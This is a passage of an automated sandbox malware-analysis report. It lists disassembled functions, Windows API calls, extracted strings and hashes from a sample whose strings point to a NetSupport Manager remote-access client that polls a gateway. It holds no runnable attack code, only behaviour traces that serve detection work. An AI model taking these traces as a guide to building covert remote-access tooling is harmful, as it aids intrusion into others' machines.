                                                                                                                • Part of subcall function 6C798FB0: _memset.LIBCMT ref: 6C798FE4
                                                                                                                • Part of subcall function 6C798FB0: getsockname.WSOCK32(?,?,00000010,?,03092EE8,?), ref: 6C799005
                                                                                                              • getsockname.WSOCK32(00000000,?,?), ref: 6C79AE4B
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898), ref: 6C79AE60
                                                                                                              • GetTickCount.KERNEL32 ref: 6C79AE6C
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6C79AE7A
                                                                                                              Strings
                                                                                                              • *TcpNoDelay, xrefs: 6C79ABB8
                                                                                                              • Cannot connect to gateway %s, error %d, xrefs: 6C79ACA6
                                                                                                              • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C79AD14
                                                                                                              • Connect error to %s using hijacked socket, error %d, xrefs: 6C79AB17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                              • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                              • API String ID: 692187944-2561115898
                                                                                                              • Opcode ID: c1a0818cd9a73d735a48003d689b7c2b7db7cbdf0d8e054f406a264447ae1585
                                                                                                              • Instruction ID: 5fc210b9219ca8ffdcac0f694660b53855a2d5905b2ce4872991611e1b9fb2eb
                                                                                                              • Opcode Fuzzy Hash: c1a0818cd9a73d735a48003d689b7c2b7db7cbdf0d8e054f406a264447ae1585
                                                                                                              • Instruction Fuzzy Hash: C7E1A571A01215AFDB10DF54DE88BDDB3B5FF49315F1041AAE909A7780DB70AE88CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2072 11139090-111390c5 2073 111390d2-111390d9 2072->2073 2074 111390c7-111390cd GetCurrentThreadId 2072->2074 2075 111390e0-111390fc call 11133920 call 11133400 2073->2075 2076 111390db call 11029330 2073->2076 2074->2073 2082 11139102-11139108 2075->2082 2083 111391db-111391e2 2075->2083 2076->2075 2086 1113975a-11139775 call 11161d01 2082->2086 2087 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 2082->2087 2084 1113929a-111392b0 2083->2084 2085 111391e8-111391ef 2083->2085 2096 111392b6-111392bd 2084->2096 2097 111393ef 2084->2097 2085->2084 2088 111391f5-111391fc 2085->2088 2118 111391d1 2087->2118 2119 11139171-11139177 2087->2119 2088->2084 2091 11139202-11139211 FindWindowA 2088->2091 2091->2084 2095 11139217-1113921c IsWindowVisible 2091->2095 2095->2084 2099 1113921e-11139225 2095->2099 2100 111392bf-111392c9 2096->2100 2101 111392ce-111392ee call 1105dd10 2096->2101 2102 111393f1-11139402 2097->2102 2103 11139435-11139440 2097->2103 2099->2084 2106 11139227-1113924c call 11138c30 IsWindowVisible 2099->2106 2100->2103 2101->2103 2124 111392f4-11139323 2101->2124 2108 11139404-11139414 2102->2108 2109 1113941a-1113942f 2102->2109 2110 11139442-11139462 call 1105dd10 2103->2110 2111 11139476-1113947c 2103->2111 2106->2084 2129 1113924e-1113925d IsIconic 2106->2129 2108->2109 2109->2103 2132 11139470 2110->2132 2133 11139464-1113946e call 1102cff0 2110->2133 2113 1113947e-1113948a call 11138c30 2111->2113 2114 1113948d-11139495 2111->2114 2113->2114 2122 111394a7 2114->2122 2123 11139497-111394a2 call 1106b860 2114->2123 2118->2083 2119->2118 2127 11139179-11139190 call 11146450 GetForegroundWindow 2119->2127 2131 111394a7 call 1112ce90 2122->2131 2123->2122 2142 11139325-11139339 call 11081a70 2124->2142 2143 1113933e-11139351 call 11143230 2124->2143 2149 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 2127->2149 2150 111391be-111391c0 2127->2150 2129->2084 2136 1113925f-1113927a GetForegroundWindow call 11131210 * 2 2129->2136 2138 111394ac-111394b2 2131->2138 2132->2111 2133->2111 2180 1113928b-11139294 EnableWindow 2136->2180 2181 1113927c-11139282 2136->2181 2144 111394b4-111394ba call 11131b00 2138->2144 2145 111394bd-111394c6 2138->2145 2142->2143 2171 1113933b 2142->2171 2163 11139353-11139364 GetLastError call 11146450 2143->2163 2164 1113936e-11139375 2143->2164 2144->2145 2147 111394d4 call 111317a0 2145->2147 2148 111394c8-111394cb 2145->2148 2155 111394d9-111394df 2147->2155 2148->2155 2156 111394cd-111394d2 call 11131870 2148->2156 2149->2150 2150->2118 2159 111391c2-111391c8 2150->2159 2166 111394e5-111394eb 2155->2166 2167 111395e9-111395f4 call 111386b0 2155->2167 2156->2155 2159->2118 2169 111391ca-111391cb SetForegroundWindow 2159->2169 2163->2164 2174 11139377-11139392 2164->2174 2175 111393e8 2164->2175 2176 111394f1-111394f9 2166->2176 2177 1113959b-111395a3 2166->2177 2191 111395f6-11139608 call 110637c0 2167->2191 2192 11139615-1113961b 2167->2192 2169->2118 2171->2143 2189 11139395-111393a1 2174->2189 2175->2097 2176->2167 2184 111394ff-11139505 2176->2184 2177->2167 2182 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 2177->2182 2180->2084 2181->2180 2187 11139284-11139285 SetForegroundWindow 2181->2187 2182->2167 2184->2167 2190 1113950b-11139522 call 1110f420 2184->2190 2187->2180 2197 111393a3-111393b7 call 11081a70 2189->2197 2198 111393bc-111393c9 call 11143230 2189->2198 2211 11139544 2190->2211 2212 11139524-11139542 call 110573b0 2190->2212 2191->2192 2207 1113960a-11139610 call 11142210 2191->2207 2195 11139621-11139628 2192->2195 2196 1113974a-11139752 2192->2196 2195->2196 2202 1113962e-11139647 call 1105dd10 2195->2202 2196->2086 2197->2198 2218 111393b9 2197->2218 2198->2175 2213 111393cb-111393e6 GetLastError call 11146450 2198->2213 2202->2196 2224 1113964d-11139660 2202->2224 2207->2192 2214 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 2211->2214 2212->2214 2213->2103 2214->2167 2252 11139594-11139599 call 110ebf30 2214->2252 2218->2198 2233 11139662-11139668 2224->2233 2234 1113968d-11139693 2224->2234 2235 11139699-111396a5 GetTickCount 2233->2235 2238 1113966a-11139688 call 11146450 GetTickCount 2233->2238 2234->2196 2234->2235 2235->2196 2239 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 2235->2239 2238->2196 2258 111396f0-111396f5 2239->2258 2252->2167 2258->2258 2259 111396f7-111396fd 2258->2259 2260 11139700-11139705 2259->2260 2260->2260 2261 11139707-11139731 call 1112c7a0 2260->2261 2264 11139733-11139734 FreeLibrary 2261->2264 2265 1113973a-11139747 call 111618c1 2261->2265 2264->2265 2265->2196
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                                              • IsWindow.USER32(0002049E), ref: 11139125
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11139133
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 1113916B
                                                                                                              • GetForegroundWindow.USER32 ref: 11139186
                                                                                                              • EnableWindow.USER32(0002049E,00000000), ref: 111391A0
                                                                                                              • EnableWindow.USER32(0002049E,00000001), ref: 111391BC
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                                              • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                                              • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                                              • IsWindowVisible.USER32(0002049E), ref: 11139248
                                                                                                              • IsIconic.USER32(0002049E), ref: 11139255
                                                                                                              • GetForegroundWindow.USER32 ref: 1113925F
                                                                                                                • Part of subcall function 11131210: ShowWindow.USER32(0002049E,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                                • Part of subcall function 11131210: ShowWindow.USER32(0002049E,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                                              • EnableWindow.USER32(0002049E,00000001), ref: 11139294
                                                                                                              • GetLastError.KERNEL32 ref: 11139353
                                                                                                              • GetLastError.KERNEL32 ref: 111393CB
                                                                                                              • GetTickCount.KERNEL32 ref: 11139678
                                                                                                              • GetTickCount.KERNEL32 ref: 11139699
                                                                                                                • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                                              • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                              • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                              • API String ID: 2511061093-2542869446
                                                                                                              • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                              • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                                              • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                              • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                                              APIs
                                                                                                              • #16.WSOCK32(00000000,?,a3zl,00000000,00000000,?,00000007), ref: 6C79924C
                                                                                                              • WSAGetLastError.WSOCK32(00000000,?,a3zl,00000000,00000000,?,00000007), ref: 6C79925B
                                                                                                              • GetTickCount.KERNEL32 ref: 6C799274
                                                                                                              • Sleep.KERNEL32(00000001,00000000,?,a3zl,00000000,00000000,?,00000007), ref: 6C7992A8
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7992B0
                                                                                                              • Sleep.KERNEL32(00000014), ref: 6C7992BC
                                                                                                              Strings
                                                                                                              • ReadSocket - Connection has been closed by peer, xrefs: 6C7992E0
                                                                                                              • ReadSocket - Would block, xrefs: 6C79928A
                                                                                                              • *RecvTimeout, xrefs: 6C79927B
                                                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C799226
                                                                                                              • ReadSocket - Error %d reading response, xrefs: 6C7992F7
                                                                                                              • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C79922B
                                                                                                              • a3zl, xrefs: 6C799244
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountSleepTick$ErrorLast
                                                                                                              • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3zl$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                              • API String ID: 2495545493-3351953597
                                                                                                              • Opcode ID: 383af028f8105531ccc4a8dfa194aea3e4dc3ec3318cc8f1ad0a7490499ea9fd
                                                                                                              • Instruction ID: f3b55910c9e68b529253f1f41d5463437f1d926be7b0101bd9c92bbde906fe19
                                                                                                              • Opcode Fuzzy Hash: 383af028f8105531ccc4a8dfa194aea3e4dc3ec3318cc8f1ad0a7490499ea9fd
                                                                                                              • Instruction Fuzzy Hash: A6318635E40208AFE710DFB9FB49B8E77F4EB55324F008565E50CD7A40E771AA548792
                                                                                                              APIs
                                                                                                              • GetSystemTime.KERNEL32(?,?,?,9382354D,67CAFB23,938234B3,FFFFFFFF,00000000), ref: 6C7A31E2
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C7CECB0), ref: 6C7A31EC
                                                                                                              • GetSystemTime.KERNEL32(?,67CAFB23,938234B3,FFFFFFFF,00000000), ref: 6C7A322A
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6C7CECB0), ref: 6C7A3234
                                                                                                              • EnterCriticalSection.KERNEL32(6C7DB898,?,9382354D), ref: 6C7A32BE
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6C7A32D3
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6C7A334D
                                                                                                                • Part of subcall function 6C7ABA20: __strdup.LIBCMT ref: 6C7ABA3A
                                                                                                                • Part of subcall function 6C7ABB00: _free.LIBCMT ref: 6C7ABB2D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                              • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                              • API String ID: 1510130979-3441452530
                                                                                                              • Opcode ID: 9cb10a64fe4e79b62c23b02b04831a88ba2ae58f4d0d8fabe10812e455d2559f
                                                                                                              • Instruction ID: 456870a6f36a8fe6f437a151a5f8800e3ed50513ec5ef430658c378429989278
                                                                                                              • Opcode Fuzzy Hash: 9cb10a64fe4e79b62c23b02b04831a88ba2ae58f4d0d8fabe10812e455d2559f
                                                                                                              • Instruction Fuzzy Hash: A2615572904208AFCB14DFE4DA88EEEB7B5FF49314F144629E516A7B40DB34B509CB61
                                                                                                              APIs
                                                                                                              • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                                              • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                                              • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                                              • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                              • String ID: SHELL32.DLL$SHGetSettings
                                                                                                              • API String ID: 4195908086-2348320231
                                                                                                              • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                              • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                                              • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                                              • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                              • API String ID: 2102423945-35127696
                                                                                                              • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                              • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                                              • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                                              • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                                                              • API String ID: 3192549508-611217420
                                                                                                              • Opcode ID: e29b56f4a67aa672c9c3122cce21b876c4d1529a7a373f118b029bff64f70a14
                                                                                                              • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                                              • Opcode Fuzzy Hash: e29b56f4a67aa672c9c3122cce21b876c4d1529a7a373f118b029bff64f70a14
                                                                                                              • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                                              APIs
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,00B9DFC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                                              • EqualSid.ADVAPI32(?,00B9DFC8,?,00000001,00000001), ref: 1109E9A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InformationToken$AllocateEqualInitialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 1878589025-0
                                                                                                              • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                              • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                                              • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                                              • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                                              APIs
